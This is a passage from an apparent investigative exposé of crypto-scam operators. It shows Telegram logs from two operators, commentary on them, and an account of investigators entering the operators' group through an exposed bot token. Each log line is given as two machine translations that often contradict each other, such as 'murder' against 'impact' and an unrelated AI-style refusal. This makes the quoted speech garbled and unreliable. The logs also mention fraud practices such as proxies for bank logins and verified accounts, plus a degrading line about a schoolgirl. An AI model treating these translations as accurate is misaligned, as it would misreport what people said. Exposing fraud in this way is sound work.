/help@SDBB_Bot/help@SDBB_Bot
B
Tómate las cosas con calma2025-11-21 21:18
/comprobar/comprobar
-- Navegador Vision Chat (2 mensajes) --
B
Tómate las cosas con calma2025-11-14 16:47
Gracias.Gracias
B
Tómate las cosas con calma2025-11-14 16:47
¿Vicen trabaja en Ru?¿Se ve el trabajo en ruso?
-- 💬ONE|Chat (86 mensajes) --
B
Tómate las cosas con calma2025-03-05 17:06
Chicos, decidme alguna tienda donde pueda comprar almohadillas.Chicos, ¿podéis decirme dónde se pueden conseguir plataformas?
B
Tómate las cosas con calma2025-03-05 16:22
ni siquiera puedo hacer un manicni siquiera es capaz de hacerse la manicura
B
Tómate las cosas con calma2025-03-05 16:22
del mismo modoigualmente
B
Tómate las cosas con calma2025-03-05 16:21
Joder, dime de una vez si el tutor tiene un chat con los alumnos o no.Joder, ¿alguien me puede decir si el tutor tiene un chat con los alumnos o no?
B
Tómate las cosas con calma2025-03-05 16:10
¿y de quién es?¿Y quién es el autor del hilo?
B
Tómate las cosas con calma2025-03-05 15:44
No es difícil, pero aquí no hay manuales completos, solo tutoriales.No es difícil, pero aquí no hay manuales completos, solo los de los instructores.
B
Tómate las cosas con calma2025-03-05 15:42
En principio, sí, si sabes cómo hacerlo.En realidad, sí, si sabes cómo
B
Tómate las cosas con calma2025-03-05 15:42
medio díamedio día
B
Tómate las cosas con calma2025-03-05 15:42
El primero tiene 600 personas, pero no responde.En el primer caso, con 600 personas, no responde
B
Tómate las cosas con calma2025-03-05 15:41
Si te lo puedes permitir, cómprate el que cuesta 200 dólares.Si tienes dinero, coge el que pide 200 $.
B
Tómate las cosas con calma2025-03-05 13:55
¿A quién le parece genial que haya un chat para estudiantes?¿Hay algún chat para alumnos en la plataforma de aprendizaje «Fantástica»?
B
Tómate las cosas con calma2025-03-03 15:10
ChequesRecibos
B
Tómate las cosas con calma2025-03-03 15:10
El que pasa la aspiradoraLa que pasa la aspiradora
B
Tómate las cosas con calma2025-03-03 15:10
EntendidoHay
B
Tómate las cosas con calma2025-03-03 15:10
Seguramente hay putas que se dedican al software.Pero aquí seguro que hay tías con el programa
B
Tómate las cosas con calma2025-03-03 15:09
FueEra
B
Tómate las cosas con calma2025-03-03 15:09
Ah, qué bien.Vaya, esto sí que mola
B
Tómate las cosas con calma2025-03-03 15:09
La torre de tres pisosTrinuria de Ruru
B
Tómate las cosas con calma2025-03-03 15:09
Y se están recogiendoY los recogen
B
Tómate las cosas con calma2025-03-03 15:09
Tip se queda ahí sentado jugando con los envoltoriosEl tío está sentado y se masturba
B
Tómate las cosas con calma2025-03-03 15:04
¿Por qué hay matrículas ucranianas?¿Por qué en ucraniano los números?
B
Tómate las cosas con calma2025-03-03 15:03
Dije «kc».Dije «kz»
B
Tómate las cosas con calma2025-03-03 15:03
Ya lo tengo.Lo he entendido
B
Tómate las cosas con calma2025-03-03 15:03
Si es complicado, te vas a perder el bombín.Si te lo pones aquí, se te va a caer el gorro
B
Tómate las cosas con calma2025-03-03 15:03
Joder, comparemos cuántas veces vas a pasar el batidor de varillas por el Facebook mientras yo retiro el roux.Joder, vamos, comparador, ¿cuántas veces vas a reiniciar Facebook mientras yo grabo el vídeo?
B
Tómate las cosas con calma2025-03-03 15:02
Para una acompañanteAcompañante
B
Tómate las cosas con calma2025-03-03 15:02
Esos tipos tienen un desarrollo tan cutre que dan ganas de mandarlos a la mierda.A los tipos de Chetso les encanta ponerse a masturbarse
B
Tómate las cosas con calma2025-03-03 15:02
Joder, aquí solo hay progres.Joder, aquí solo hay trabajadores de la carretera
B
Tómate las cosas con calma2025-03-03 15:02
¿Qué tipo de mesas?¿Qué mesas?
B
Tómate las cosas con calma2025-03-03 15:01
Te daré 30 si tienes una voz bonita.Tendrás 30 si tu voz es bonita
B
Tómate las cosas con calma2025-03-03 15:01
Hay más dineroAllí hay más dinero
B
Tómate las cosas con calma2025-03-03 15:01
Ven a trabajar a mi empresa.Ven a trabajar a mi centro cultural
B
Tómate las cosas con calma2025-03-03 15:00
NoNo
B
Tómate las cosas con calma2025-03-03 14:59
PlategamPlategam
B
Tómate las cosas con calma2025-03-03 14:59
+ No sé cómo funciona la repetición+ No entiendo nada de los mensajes
B
Tómate las cosas con calma2025-03-03 14:59
Es difícil encontrar buenos lanzamientos.Es difícil encontrar buenos drops
B
Tómate las cosas con calma2025-03-03 14:58
¿O hay una versión 1.0?O bien, la versión 1.0 está disponible
B
Tómate las cosas con calma2025-03-03 14:58
Aquí solo hay 2,0 phish.Y aquí las fichas con una corriente de 2,0 A
B
Tómate las cosas con calma2025-03-03 14:58
O mejor 1.0 que 2.0.Bueno, o mejor 1.0 que 2.0
B
Tómate las cosas con calma2025-03-03 14:57
Con mamutsCon los mamuts
B
Tómate las cosas con calma2025-03-03 14:57
La versión 2.0 no funciona si te pasas el día holgazaneando.2.0: no vale la pena quedarse aquí a perder el tiempo
B
Tómate las cosas con calma2025-03-03 14:57
Yo soy más de tráfico.Ya no soy el que tiene más tráfico
B
Tómate las cosas con calma2025-03-03 14:57
Aquí están las «X» de RooAquí están las X en la mano
B
Tómate las cosas con calma2025-03-03 14:56
Pero no se trata de eslóganes publicitariosPero no se trata de equipos de publicidad
B
Tómate las cosas con calma2025-03-03 14:56
Sí, lo hacen. Conozco a alguien que lo hace.¿Hay alguien que lo haga?
B
Tómate las cosas con calma2025-03-03 14:56
No es el caso si sabes cómo ganar entre 400 y 500 al día.No es tan difícil; si sabes cómo, hay gente que gana entre 400 y 500 al día.
B
Tómate las cosas con calma2025-03-03 14:55
¿Y qué tiene de especial?)Bueno, ¿y qué es lo que se me ha olvidado aquí?
B
Tómate las cosas con calma2025-03-03 14:55
Hay un enlace al manualAhí hay un enlace al manual
B
Tómate las cosas con calma2025-03-03 14:54
Este es el tipo de manosAsí es como se hacen las cosas
B
Tómate las cosas con calma2025-03-03 14:54
Babeando y mirando con lascivia para que me den una mano.Joder, para poner en marcha el coche, se te puede hacer la boca agua y los ojos se te pueden ir de lado a lado
B
Tómate las cosas con calma2025-03-03 14:54
Bueno, ¿cuál es el problema? Es lo mismo.Bueno, ¿y cuál es el problema? Es lo mismo.
B
Tómate las cosas con calma2025-03-03 14:53
Tardaremos un mes en llegar a la zonaLlegarán a la zona en un mes
B
Tómate las cosas con calma2025-03-03 14:53
Y no hay ningún sitio adonde ir. Si tienes dos dedos de frente, ya te darás cuenta. Si no, te vas de aquí.Y tampoco hay nada que hacer aquí; si tienes cabeza, te darás cuenta de que no hay nada que hacer.
B
Tómate las cosas con calma2025-03-03 14:53
¿Qué quieres?¿Qué querías?
B
Tómate las cosas con calma2025-03-03 14:53
AnuncioPublicidad
B
Tómate las cosas con calma2025-03-03 14:52
Llevo aquí dos días y la versión 2.0 no me parece interesante. A mí me parecía genial.Llevo aquí dos días y la versión 2.0 no me interesa; pensaba que sería algo divertido.
B
Tómate las cosas con calma2025-03-03 14:52
Y que te vaya de maravillaY tener un mamut
B
Tómate las cosas con calma2025-03-03 14:52
Piensa bien lo que vas a decir.Hay que pensar bien qué responder
B
Tómate las cosas con calma2025-03-03 14:52
No hay secretosAquí no hay secretos
B
Tómate las cosas con calma2025-03-03 14:52
¿Qué te va a dar?¿Qué te aportará?
B
Tómate las cosas con calma2025-03-03 14:52
Bueno, ¿qué sentido tiene si el manual contiene exactamente la misma información?Pero, ¿qué sentido tiene si toda esa información está en el manual?
B
Tómate las cosas con calma2025-03-03 14:51
Tendrá tiempo para responder a todas vuestras preguntas¿Cómo coño vamos a dar abasto para responderos a todos?
B
Tómate las cosas con calma2025-03-03 14:51
Menudo entrenamiento.¿Qué práctica?
B
Tómate las cosas con calma2025-03-03 14:51
Hay 100 personas ahí dentro.Joder, tiene como 100 personas allí
B
Tómate las cosas con calma2025-03-03 14:51
¿Por qué no me das algo de dinero y yo te doy el manual de la abrazadera?¿Me pueden pasar un poco de pasta? A cambio les paso el manual.
B
Tómate las cosas con calma2025-03-03 14:50
Al fijarEn el soporte
B
Tómate las cosas con calma2025-03-03 14:50
No necesitas un manual que te lo explique todo.¿Para qué os hace falta una formación? Ya tenéis el manual.
B
Tómate las cosas con calma2025-03-03 14:50
La versión 2.0 es lo que es.2.0: era así y sigue siéndolo
B
Tómate las cosas con calma2025-03-03 14:50
¿Qué coño pasa?¿Qué coño es este problema?
B
Tómate las cosas con calma2025-03-03 14:48
¿Lo has iniciado tú mismo?¿Ya lo has puesto en marcha tú mismo?
B
Tómate las cosas con calma2025-03-03 14:48
No es ninguna locuraNo funciona para nada
B
Tómate las cosas con calma2025-03-03 14:48
Hay un impacto en el lkHay un asesinato en LK
B
Tómate las cosas con calma2025-03-03 14:48
¿Qué pasa con el lk?¿Cuántas unidades se producen por hora?
B
Tómate las cosas con calma2025-03-03 14:48
¿Cuál de estos sois vosotros, capullos, como vosotros mismos decís?¿De quién coño son estas, si me permites la expresión?
B
Tómate las cosas con calma2025-03-03 14:47
No entiendo lo que quieres decir con eso.No he entendido bien lo que has dicho
B
Tómate las cosas con calma2025-03-03 14:46
Si han iniciado sesión, perfecto.Si entran en el LC, entonces ZBS
B
Tómate las cosas con calma2025-03-03 14:46
Bueno, ¿se conectan?¿Entran en el chat privado?
B
Tómate las cosas con calma2025-03-03 14:45
No sé cómo las graban.No sé, no tengo ni idea de cómo se graban
B
Tómate las cosas con calma2025-03-03 14:45
¿Perros que hay que dar por perdidos?¿Fumas por la revista?
B
Tómate las cosas con calma2025-03-03 14:45
Joder, hay un puto botón¡Y una mierda, además de tener que andar pisando la nieve!
B
Tómate las cosas con calma2025-03-03 14:42
Me lo estoy sirviendo yo mismoLo sirvo yo mismo
B
Tómate las cosas con calma2025-03-03 14:42
Joder, me he dado cuenta de que no es para los que no se lo toman en serio.Joder, lo he entendido, pero no me importa una mierda
B
Tómate las cosas con calma2025-03-03 14:41
Tío, aquí no venden nada con fichas, es una ficha de día de paga.Tío, aquí no venden nada con fichas; aquí las fichas son para pagar.
B
Tómate las cosas con calma2025-03-03 14:41
Ya lo pillo, no hay ningún sitio donde echarloYa lo pillo, aquí no hay dónde echarlo
B
Tómate las cosas con calma2025-03-03 14:40
Creo que es la versión 2.0 estándar.Los habituales 2.0, más o menos
B
Tómate las cosas con calma2025-03-03 14:40
No es que estén saturando el tráficoPero aquí no se genera tráfico
-- Fbstore: ¡El chat de los webmasters de éxito! (23 mensajes) --
B
Tómate las cosas con calma2025-02-26 07:51
Bueno, haz lo que te dé la gana, joder.Bueno, pues ahí tienes, a quién le importa la cara
B
Tómate las cosas con calma2025-02-26 07:50
Un escolar, 200 rublos.Bueno, una colegiala por 200 rublos
B
Tómate las cosas con calma2025-02-26 07:50
FuncionaráServirá
B
Tómate las cosas con calma2025-02-26 07:50
Te encontrarás con un vagabundo en la calle.Lo siento, pero no puedo ayudarte con eso.
B
Tómate las cosas con calma2025-02-26 07:50
Así que cada uno cree en su propia cara, sea de quien sea.Así que todos se identifican con su foto, a quién le importa
B
Tómate las cosas con calma2025-02-26 07:50
En la cara.A su propio riesgo
B
Tómate las cosas con calma2025-02-26 07:49
Pero la verdad es que, da igual, ya lo he hecho diez veces.Pero, en realidad, qué más da, tengo como 10 cuentas verificadas
B
Tómate las cosas con calma2025-02-26 07:49
A ver, dime, solo estás diciendo tonterías.Entonces, dime, ¿estás diciendo tonterías?
B
Tómate las cosas con calma2025-02-26 07:49
PuedesSe puede
B
Tómate las cosas con calma2025-02-26 07:49
En la cara.A su propio riesgo
B
Tómate las cosas con calma2025-02-16 20:26
en lugar de joderlos con algún tipo de entrenamiento y hacerles correr de un lado a otro.en lugar de, ya sabes, engañarlos con algún tipo de formación y sacarles dinero
B
Tómate las cosas con calma2025-02-16 20:25
lo de siempre: UBT, YouTube, etc.los canales habituales: UBT, TT, YouTube, etc.
B
Tómate las cosas con calma2025-02-15 17:31
XzХз
B
Tómate las cosas con calma2025-02-15 17:31
Con el pretexto de la formaciónCon el pretexto de la formación
B
Tómate las cosas con calma2025-02-15 17:31
Hacia los canalesEn los canales
B
Tómate las cosas con calma2025-02-15 17:31
Es solo el tráfico de gente.Simplemente, el tráfico de gente me agobia
B
Tómate las cosas con calma2025-02-15 17:31
Así que el tipo dice que nos suscribamos a todos sus canalesEl tipo dice que te suscribas a todos sus canales
B
Tómate las cosas con calma2025-02-15 16:36
No hace falta que escribasHui Nyu sugiere que no escribas
B
Tómate las cosas con calma2025-02-06 15:11
Si no sabes lo básico sobre cómo servir, vas a...Si no conoces conceptos básicos como el moldeado, ¿cómo vas a hacerlo?
B
Tómate las cosas con calma2025-02-06 15:11
Hay un botón para cambiar el aipi; al menos deberías buscarlo en Google.Si pulsas ese botón, cambia la IP; si quieres, búscalo en Google
B
Tómate las cosas con calma2025-02-06 15:10
🤨🤨
B
Tómate las cosas con calma2025-02-06 15:09
Puedes cambiar la posición del aipi girándolo.Allí se puede cambiar la rotación del API
B
Tómate las cosas con calma2025-02-06 15:09
¿Por qué el 1? Es lo mismo Móvil¿Por qué el 1? Si es que Móviles
-- CryptoGrab - Chat de ayuda mutua (10 mensajes) --
B
Tómate las cosas con calma2025-02-06 15:31
No es tan sencilloNo es tan sencillo
B
Tómate las cosas con calma2025-02-06 15:31
Fácil.Rastro
B
Tómate las cosas con calma2025-01-23 20:30
Ni un solo ejemploNo hay ni un solo ejemplo
B
Tómate las cosas con calma2025-01-23 20:30
No me hace ninguna gracia que no haya podido encontrar ningún anuncio de pruebas de LMA en Internet.Es curioso que no haya encontrado ni un solo anuncio de las pruebas AML en Internet
B
Tómate las cosas con calma2025-01-23 17:20
No hay nada en absoluto en el AML.En AML no hay nada en absoluto
B
Tómate las cosas con calma2025-01-23 17:20
Probé aml en Facebook para ver si en Estados Unidos también era útil, incluso con paquetes antiguos que no se encuentran en InternetHe intentado buscar «aml» en Facebook, pero tampoco he encontrado nada interesante, ni siquiera enlaces antiguos, en Internet.
B
Tómate las cosas con calma2025-01-23 17:19
Bueno, ¿qué tipo de oferta tienes pensado hacer?Bueno, ¿qué tipo de oferta tienes pensado hacer?
B
Tómate las cosas con calma2025-01-23 17:16
¿Usas AML?¿Y tú bebes AML?
B
Tómate las cosas con calma2025-01-21 20:38
A cualquiera que publique en Facebook le gustaría aclarar un par de cosas¿Hay alguien que publique en Facebook? Me gustaría aclarar un par de cosas.
B
Tómate las cosas con calma2025-01-20 11:08
¿Alguien tiene algún ejemplo de creos para AML?¿Alguien tiene ejemplos de creatividades para AML?
-- Rolex | chat general (28 mensajes) --
B
Tómate las cosas con calma2024-09-11 15:29
¿Qué están haciendo los lituanos en qué pista?¿Y a Lituania la están machacando en qué campo?
B
Tómate las cosas con calma2024-09-11 15:21
¿Estás jugando con el tornillo?¿Pero qué coño estás haciendo?
B
Tómate las cosas con calma2024-09-11 15:20
Es solo que las páginas son muy restrictivas y hay que perder mucho tiempo con ellasEs que las plataformas limitan mucho el trabajo y son un rollo
B
Tómate las cosas con calma2024-09-11 15:19
Tengo una idea en mente. Si lo hacen, va a ser jodidamente genial.Se me ocurrió una idea y la escribí; si la llevan a cabo, va a ser la bomba.
B
Tómate las cosas con calma2024-09-11 15:19
No veo muchos troncos por la finca.La verdad es que no veo muchos logotipos de la Finka
B
Tómate las cosas con calma2024-09-11 15:19
Se está montando un lío de cuidado con todas las salas.Venga ya, esos tipos tienen un lío de cojones con todas las plataformas
B
Tómate las cosas con calma2024-09-11 15:16
Eso es lo que digo, es como un vado sobre otro vado.Bueno, pues ya te digo que es un timo tras otro
B
Tómate las cosas con calma2024-09-11 15:15
No entiendo qué es lo que está mejorando ahora; veo que en Finlandia nadie está trabajando.No entiendo qué es lo que funciona mejor ahora mismo; veo que a todo el mundo le falla algo en la aplicación.
B
Tómate las cosas con calma2024-09-11 15:08
Bueno, tienes un 50 % de posibilidades de que te salga bien con los proxies.Bueno, 50/50, si tenemos suerte con los proxies
B
Tómate las cosas con calma2024-09-11 15:07
Pero, para que te hagas una idea, hoy en día, con los proxies de lujo, incluso en Viber, cuando inicias sesión, se vuelve loco.Pero para que lo entiendas: ahora, con los proxies de lujo, incluso en Viber, cuando entras, te bloquean.
B
Tómate las cosas con calma2024-09-11 15:07
Bueno, no sé nada sobre las latas de la UE.Bueno, no tengo ni idea de cómo funcionan los bancos europeos
B
Tómate las cosas con calma2024-09-11 15:07
Y lkEn el perfil
B
Tómate las cosas con calma2024-09-11 15:06
Antes, las tiendas de delicatessen tenían 10 cámaras frigoríficasAntes, los lujosos de 10 pasos se mantenían
B
Tómate las cosas con calma2024-09-11 15:06
Bueno, el 922 también está en el primer puesto y se mantiene ahí.Bueno, el 922 también entra y se queda en el 1
B
Tómate las cosas con calma2024-09-11 15:05
Incluso «privat» después de tres visitas les pone los pelos de punta.Incluso en privado, después de tres intentos, los engaña
B
Tómate las cosas con calma2024-09-11 15:05
Si 1 apoderado representa a 1 o 2 bancosSi hay 1 proxy, 1-2 bancos de corriente
B
Tómate las cosas con calma2024-09-11 15:05
Bueno, depende del bancoBueno, depende del banco
B
Tómate las cosas con calma2024-09-11 15:04
Los representantes suelen ser unos sinvergüenzas en toda esa sarta de tonteríasEn Laksheri, los proxies suelen estar sucios
B
Tómate las cosas con calma2024-09-11 08:44
¿Está dormido?¿Y él está durmiendo?
B
Tómate las cosas con calma2024-09-11 08:40
¡Vaya, qué buena idea!Se le ocurrió una idea genial
B
Tómate las cosas con calma2024-09-11 08:40
¿No hay por ahí algún mercadillo o algo así?¿Y por qué no tienen mercadillos por aquí y por allá?
B
Tómate las cosas con calma2024-09-11 08:40
Qué desastreHuevo
B
Tómate las cosas con calma2024-09-11 08:39
BalónBilyá
B
Tómate las cosas con calma2024-09-11 08:39
¿Hay salas de chat?¿Hay chats allí?
B
Tómate las cosas con calma2024-09-11 08:38
¿Alguien sabe¿Alguien sabe?
B
Tómate las cosas con calma2024-09-11 08:38
¿La gente de la finca usa Telegram?¿Se usa Telegram en la finca?
B
Tómate las cosas con calma2024-09-10 12:14
Gracias.Gracias
B
Tómate las cosas con calma2024-09-10 12:13
¿Qué hora es en Finlandia?¿Qué hora es ahora en Finlandia?
-- Actualidad/verificaciones/ingresos💃🛍 (37 mensajes) --
B
Tómate las cosas con calma2024-06-16 17:17
No veo a nadie que la defienda con vehemenciaNo veo aquí a nadie que la defienda con vehemencia
B
Tómate las cosas con calma2024-06-16 17:17
En fin, se ha explicado la situación y ahora cada uno toma su propia decisión, y el hecho de que solo el administrador Pasha la defienda lo dice todo.Bueno, ya he explicado la situación; ahora cada uno que decida por sí mismo. Y el hecho de que solo el administrador Pasha la defienda dice mucho.
B
Tómate las cosas con calma2024-06-16 17:15
Y tampoco volvió a pagarY otra vez no ha pagado
B
Tómate las cosas con calma2024-06-16 17:15
No, ella nos lo transfirió, pero luego no teníamos la cuenta principal para transferir el dinero, así que, como último recurso, le escribimos a Vika.No, ella nos pasó el problema a nosotros, pero nosotros no teníamos la cuenta principal para transferir el dinero, así que le escribimos a Vika como último recurso.
B
Tómate las cosas con calma2024-06-16 17:14
Al principio nosotros también estábamos bien, pero últimamente tu dinero no deja de desaparecer.Al principio todo iba bien, pero últimamente se os va el dinero constantemente
B
Tómate las cosas con calma2024-06-16 17:14
¿Estoy haciendo spam? Solo estoy aquí contando la verdad. Puedes ignorarlo. Que la gente sepa cómo trabajas.¿Y yo tengo spam? Estoy aquí contando la verdad a la gente; puedes borrarlo, ¿qué va a cambiar? Que la gente sepa cómo trabajáis.
B
Tómate las cosas con calma2024-06-16 17:13
Cuando tienes uno de estosSi te pasa algo así
B
Tómate las cosas con calma2024-06-16 17:13
Así que es hora de que reflexionesAsí que es hora de que se lo piensen
B
Tómate las cosas con calma2024-06-16 17:13
Nosotros también llevamos mucho tiempo trabajando con nei y esta es la segunda vez que se da esta situaciónLlevamos mucho tiempo trabajando con ella y esta ya es la segunda vez que pasa
B
Tómate las cosas con calma2024-06-16 17:13
Y grabó los «gs» y dijo: «Ya sabes cómo funciona».Y ella tomó nota y dijo que ya sabías cómo funciona
B
Tómate las cosas con calma2024-06-16 17:13
Eso es exactamente lo que pasó. Empecemos por el principio: le cogimos la tarjeta para ingresar 60 000, ella fue a sacarlos y nos dice que el dinero no estará ahí porque el cajero se quedó con la tarjeta, y ya está: acabamos de tirar 60 000 a la basura.Exactamente, eso es lo que pasó: vamos a empezar por el principio. Le pedimos su tarjeta para ingresar 60 000, ella fue a sacarlos y nos dijo que no habría dinero, que, al parecer, el cajero automático se había quedado con la tarjeta y que se había perdido todo. Así que, en definitiva, tiramos por la borda 60 000.
B
Tómate las cosas con calma2024-06-16 17:11
No es ella quien nos tiene¿No somos nosotros los que estamos con ella?
B
Tómate las cosas con calma2024-06-16 17:11
Aunque nos robaron 60 000Aunque nos han robado 60 000
B
Tómate las cosas con calma2024-06-16 17:11
¿Normal? Ya lo hemos explicado todo aquí. Estás diciendo que somos unos idiotas.¿Normales? Ya lo hemos explicado todo aquí, y tú dices que somos unos idiotas.
B
Tómate las cosas con calma2024-06-16 17:10
La estás defendiendoLa defiendes
B
Tómate las cosas con calma2024-06-16 17:10
Todavía tiene nuestro dineroSe quedó con nuestro dinero
B
Tómate las cosas con calma2024-06-16 17:10
Todos ellosTodo
B
Tómate las cosas con calma2024-06-16 17:10
Le dieron 60 000 dólares a un hombre, pero ella dijo que no tenía dinero.Le dieron 60 000 y él dijo que no habría dinero
B
Tómate las cosas con calma2024-06-16 17:10
Descrito*Descrito*
B
Tómate las cosas con calma2024-06-16 17:10
Ya se te ha explicado toda la situaciónTe han explicado toda la situación
B
Tómate las cosas con calma2024-06-16 17:09
¿Quién se echa un trago? ¿Ella o nosotros?¿Quién es la tonta, ella o nosotros?
B
Tómate las cosas con calma2024-06-16 17:09
Tenemos 60 000 dólares en el banco. ¿Dónde está el dinero?Han ingresado 60 000, ¿dónde está el dinero?
B
Tómate las cosas con calma2024-06-16 17:09
Ya te han explicado toda la situación, da igual cuál sea tu sexo.¿Qué mujeres te han explicado toda la situación? El sexo no importa en absoluto.
B
Tómate las cosas con calma2024-06-16 17:08
Saca 60 000 y déjalo ahí.Ganar 60 000 y darlo todo
B
Tómate las cosas con calma2024-06-16 17:08
O que te jodan, dentro de lo razonable.¿O qué coño os pasa, dentro de lo razonable?
B
Tómate las cosas con calma2024-06-16 17:08
La gente no tiene con qué pagar¿De dónde sacan el dinero para pagar?
B
Tómate las cosas con calma2024-06-16 17:08
Y dice que la tarjeta se ha estropeado y que se ha quedado sin dinero.Y dice que la tarjeta se ha atascado y que no hay dinero
B
Tómate las cosas con calma2024-06-16 17:08
A un hombre le dieron 60 000 dólares, y ella se fue a rodar.Le dieron 60 000 y se fue a rodar
B
Tómate las cosas con calma2024-06-16 17:07
Así que me vas a contar los hechos.Entonces, ¿podrías explicarlo con más detalle?
B
Tómate las cosas con calma2024-06-16 17:07
Entonces, ¿a quién coño hay que culpar? ¿Quién es el que me ha metido en este lío?¿Y quién coño tiene la culpa, quién es el responsable?
B
Tómate las cosas con calma2024-06-16 17:07
¿No tienes nada que decir?¿No hay nada que decir?
B
Tómate las cosas con calma2024-06-16 17:07
O no podía teclear el puto código PIN.¿O qué coño? Ni siquiera he podido escribir «pin» con estas manos torcidas
B
Tómate las cosas con calma2024-06-16 17:06
¿Cómo coño se le puede atascar la tarjeta a un cajero automático?¿Cómo coño se le ha podido tragar la tarjeta al cajero?
B
Tómate las cosas con calma2024-06-16 17:06
ChuponesSuciones
B
Tómate las cosas con calma2024-06-16 17:06
Y tú te estás corriendo por ella.¿Y vosotros qué coño hacéis aquí descargando eso por ella?
B
Tómate las cosas con calma2024-06-16 17:06
Joder, sois unos jodidos idiotas. Tenéis a una jodida mujer aquí sentada liándose con su dinero y el cajero le ha tragado la tarjeta.Joder, qué jodidos sois, tíos. Tenéis una mierda en las manos y os creéis que el cajero le ha tragado la tarjeta.
B
Tómate las cosas con calma2024-06-16 16:40
@kysia1987 no funciona, es una estafa; le di una patada voladora y se fusionó con 60 000@kysia1987 No funciona, es una estafa; me dio una pequeña ganancia y luego se esfumó con 60 000
MONETTI ESCOBAR: El jefe silencioso
En marcado contraste con los 261 mensajes de Bonya, MONETTI solo tiene 10 mensajes públicos — todo en un solo hilo en Chat de TraFFeeQ (Arbitraje de tráfico negro de ADS/SEO), en defensa de un compañero:
Chat de TraFFeeQDiciembre de 2025
«Un hombre hace su trabajo y le pagan por ello. ¿Te parece bien?»
Una persona hace su trabajo, le pagan por ello, ¿qué más hay que decir?
Considerar la actividad delictiva como «un trabajo más»
Chat de TraFFeeQDiciembre de 2025
«No hay nada que discutir contigo»
No hay nada que discutir contigo
Autoridad desdeñosa: mentalidad de jefe, por encima de cualquier debate
Chat de TraFFeeQDiciembre de 2025
«¡Hay muchas cosas que hacer aparte de ti!»
Sin ti tengo cosas que hacer)
Implica múltiples operaciones simultáneas que requieren su atención
Los grupos de Telegram de MONETTI lo dicen todo: Medusa de Google Ads (fraude de PPC de «black hat»), un Canal de deepfakes (medios sintéticos para el fraude), y Charla sobre Marlboro (privado, desconocido). La suscripción a Telegram Premium, horario comercial 24 horas al día, 7 días a la semana, y «Есть предложение» («Tengo una propuesta») La biografía profesional de esta persona da a entender que se dedica a la ciberdelincuencia a tiempo completo.
MONETTI ESCOBAR: Registro completo de mensajes (10 mensajes)
-- TraFFeeQ Chat | Arbitraje de tráfico | Black ADS/SEO | (9 mensajes) --
ME
MONETTI ESCOBAR2025-12-06 20:42
¡Déjalo!¡Déjalo!
ME
MONETTI ESCOBAR2025-12-06 20:42
Un hombre hace su trabajoLa persona se dedica a su trabajo
ME
MONETTI ESCOBAR2025-12-06 20:42
Sin agresividadSin ningún tipo de agresión
ME
MONETTI ESCOBAR2025-12-06 20:40
Tampoco te preocupes por esoNo te preocupes por eso tampoco
ME
MONETTI ESCOBAR2025-12-06 20:39
Habla con él, tío. No tiene prohibido hacerlo.Habla con él, tío, a él no le han prohibido hacerlo
ME
MONETTI ESCOBAR2025-12-06 20:39
¡Hay muchas cosas que hacer además de estar contigo!)¡Hay otras cosas que hacer aparte de ti!)
ME
MONETTI ESCOBAR2025-12-06 20:39
No hay nada que discutir contigoNo hay nada que discutir contigo
ME
MONETTI ESCOBAR2025-12-06 20:38
Está escrito junto a su apodo. No hace falta que lo toques, lo verás.Junto a su nombre de usuario pone: «No le des en el hombro, léelo».
ME
MONETTI ESCOBAR2025-12-06 20:38
El hombre hace su trabajo, le pagan por ello (me gustaría hablar de ello)Cada uno hace su trabajo, cobra por ello; si te gusta, coméntalo.
-- Medusa | Google Ads | Chat (1 mensaje) --
ME
MONETTI ESCOBAR2025-09-23 18:07
😍😍

Captura de pantalla 2 — Perfil de MONETTI en Telegram.

Captura de pantalla 3 — Perfil de Bonya. Fíjate en DC2 (Ámsterdam).
Sección 7: La habitación del pánico
Después de que PhishDestroy accediera al grupo de operadores a través del bot de Telegram expuesto, tuvo lugar el siguiente intercambio. El registro de la conversación que figura a continuación se ha traducido al inglés, conservando el ruso original en cursiva. Se ha ocultado la identidad utilizada para acceder.
— REDACTED se conectó mediante un token de bot expuesto —
R
OMITIDO25-03-2026 13:03:43
/inicio
ME
MONETTI ESCOBAR25-03-2026 13:06:53
?
ME
MONETTI ESCOBAR25-03-2026 13:07:03
¿Quién?¿Quién?
B
Tómate las cosas con calma25-03-2026 13:07:14
XzХз
R
OMITIDO25-03-2026 13:07:14
Hola, solo tienes que guardar tus datos y esperar un momento.
ME
MONETTI ESCOBAR25-03-2026 13:07:24
¿Qué coño?¿Qué coño?
B
Tómate las cosas con calma25-03-2026 13:07:27
JoderJoder
B
Tómate las cosas con calma25-03-2026 13:07:28
Ese es¿Quién es quién?
ME
MONETTI ESCOBAR25-03-2026 13:07:42
Ajá.Jaja
ME
MONETTI ESCOBAR25-03-2026 13:07:44
¿Qué coño pasa?Joder
B
Tómate las cosas con calma25-03-2026 13:07:53
El bot ha sido pirateadoHan hackeado el bot
B
Tómate las cosas con calma25-03-2026 13:08:16
Me han dicho que nuestra defensa es un desastre.Por cierto, me han dicho que nuestra defensa es una auténtica pasada.
B
Tómate las cosas con calma25-03-2026 13:08:22
Bueno, hay un tipoBueno, hay un tipo por ahí
B
Tómate las cosas con calma25-03-2026 13:08:43
Es como colar un bot a través de un ataque de phishing.Con nuestro bot, romper una ficha es pan comido
ME
MONETTI ESCOBAR25-03-2026 13:09:09
@devosus
ME
MONETTI ESCOBAR25-03-2026 13:09:21
[OMITIDO].[OMITIDO]
ME
MONETTI ESCOBAR25-03-2026 13:09:24
¿Quién es ese?¿Quién es ese?
B
Tómate las cosas con calma25-03-2026 13:10:29
Comprueba tu perfil.Echa un vistazo a tu perfil
B
Tómate las cosas con calma25-03-2026 13:10:32
Es un hackerEs un hacker
B
Tómate las cosas con calma25-03-2026 13:10:35
Literalmente.En sentido estricto
B
Tómate las cosas con calma25-03-2026 13:10:41
Tradujo lo que estaba canalizando¿Qué es lo que escribe en el canal?
B
Tómate las cosas con calma25-03-2026 13:10:55
[OMITIDO — Bonya copia y pega el mensaje del canal que denunció su dominio, intentando averiguar quién lo ha marcado]
B
Tómate las cosas con calma25-03-2026 13:12:19
Bueno, eh...Bueno, pues ya está
B
Tómate las cosas con calma25-03-2026 13:12:23
No tengo ni puta idea de quién es ese.Ni idea de quién es ese
B
Tómate las cosas con calma25-03-2026 13:12:25
Pero no para siemprePero no en el buen sentido
B
Tómate las cosas con calma25-03-2026 13:12:47
@devosus, pensemos en la defensa antes de que nos den una paliza.@devosus, piensa en la defensa antes de que nos den una paliza
Nota del editor: Bonya lo ve venir. Supongamos que es ruso y que considera que estafar a Ucrania es «patriótico». Entonces, ¿qué hay de Indonesia —un
